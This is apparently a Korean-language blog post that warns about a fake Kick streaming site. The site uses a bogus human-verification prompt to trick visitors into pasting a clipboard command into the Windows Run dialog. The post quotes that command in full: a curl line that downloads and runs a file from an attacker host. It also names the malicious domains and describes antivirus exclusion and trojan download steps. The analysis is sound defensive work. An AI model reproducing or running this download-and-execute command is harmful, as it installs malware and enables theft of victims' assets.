아침에 여러 그룹의 채팅 기록을 보았는데, 한 노인이 가짜 피싱 사이트를 방문했는데 그의 컴퓨터가 트로이 목마에 감염되어 그의 자산을 도난당했다는 내용이었습니다. 그의 도난 과정을 분석해 보겠습니다.

위 채팅 기록에서 볼 수 있듯이 그는 다음 URL의 가짜 Kick 웹사이트를 방문했습니다: https://kick.com.im/

중요 알림: 이 웹사이트는 피싱 웹사이트이므로 방문하지 마세요! ! ! 피싱사이트입니다, 방문하지 마세요! ! ! 피싱사이트입니다, 방문하지 마세요! ! !

이 웹 사이트를 방문하면 사람인지 여부가 확인됩니다. 확인을 클릭하면 다음 메시지가 나타납니다.

위 그림에서 요구하는 작업을 설명해 보겠습니다.

1. Windows+R을 눌러 실행 대화 상자를 엽니다.

Windows+R은 Windows 시스템에서 실행 대화 상자를 빠르게 여는 데 사용되는 바로 가기 명령입니다. 여기에서 악성 스크립트 파일을 실행할 준비가 됩니다.

2. CTRL+V를 눌러 인증 텍스트를 붙여넣으세요.

붙여넣기에는 CTRL+V가 사용된다는 것은 다들 아시죠? 이 단계에서 궁금한 점이 있으신가요? Ctrl+V를 누르기 전에 복사하지 않고 붙여넣는 이유는 무엇인가요?

피싱 웹사이트의 프런트엔드 코드를 살펴보겠습니다.

비밀은 여기에 있습니다. 우리가 처음 웹 사이트를 방문했을 때 우리가 인간인지 확인하라는 메시지가 표시되었습니다. 확인하려면 마우스를 클릭해야 했습니다. 위의 js 코드는 마우스 클릭 이벤트를 감지하는 것입니다. 발견되면 악성 스크립트가 자동으로 페이스트보드에 복사됩니다. 이때 CTRL+C를 사용하지 않고 바로 CTRL+V를 누를 수 있습니다.

그럼 페이스트리 속 악성코드는 무엇일까요?

cmd /c "curl -k -L -Ss https://hcaptcha.ru/r -o "%TEMP%\ 1.cmd" && "%TEMP%\ 1.cmd"" # 확인을 완료하려면 확인 또는 Enter 키를 누르세요. . 확인을 누르면 로봇이 아님을 확인하게 됩니다.

위 코드는 https://hcaptcha.ru/r의 의미입니다 ( 중요 알림: 피싱 웹사이트입니다. 방문하지 마세요!!! 피싱 웹사이트입니다. 방문하지 마세요!!! 피싱 웹사이트입니다. 방문하지 마세요!!! ) 파일을 다운로드하여 임시 디렉터리에 저장한 후, 이 파일을 실행하세요.

다운로드한 파일을 열고 다음 코드를 찾으세요.

이 악성 코드는 먼저 사용자에게 관리자 권한이 있는지 확인합니다. 관리자 권한이 있으면 스크립트를 관리자 권한으로 승격시키려고 합니다.

코드의 두 번째 부분은 Base 64로 인코딩되었으며, 디코딩 시 바이러스 백신 검사에서 C:\를 제외하는 것으로 나타났습니다. 이 단계의 목적은 바이러스 백신 소프트웨어에 "C:|검사하지 마세요!"를 알려주어 C 드라이브에서 트로이 목마가 실행될 때 바이러스 백신 소프트웨어에 의해 발견되지 않도록 하는 것입니다.

코드의 세 번째 부분인 gpt는 구문 분석되지 않았습니다. 일반적인 목적은 웹사이트에서 C 드라이브로 트로이 목마를 다운로드한 다음 트로이 목마를 실행하는 것입니다. 이를 위해서는 @evilcos 와 같은 보안 전문가의 자세한 분석이 필요합니다.

위의 피싱 사기를 통해 다음과 같은 경험을 얻을 수 있습니다.

1. 낯선 사이트에 접속하기 전 해당 사이트가 맞는지 반드시 확인하세요. 위의 피해자처럼 kick 라이브 방송 URL을 피싱 사이트로 착각한 사람입니다. kick의 공식 URL은 https://kick.com/ 입니다 . 피해자가 구글에서 검색하거나 gpt에 대해 물어보면 속지 않습니다.

2. 각 작업을 수행하기 전에 주의해야 합니다. 이해하지 못하거나 불분명한 경우에는 GPT와 같은 AI 도구를 잘 사용해야 합니다.

Web3에는 함정이 가득합니다. 모두가 함정을 피할 수 있기를 바랍니다.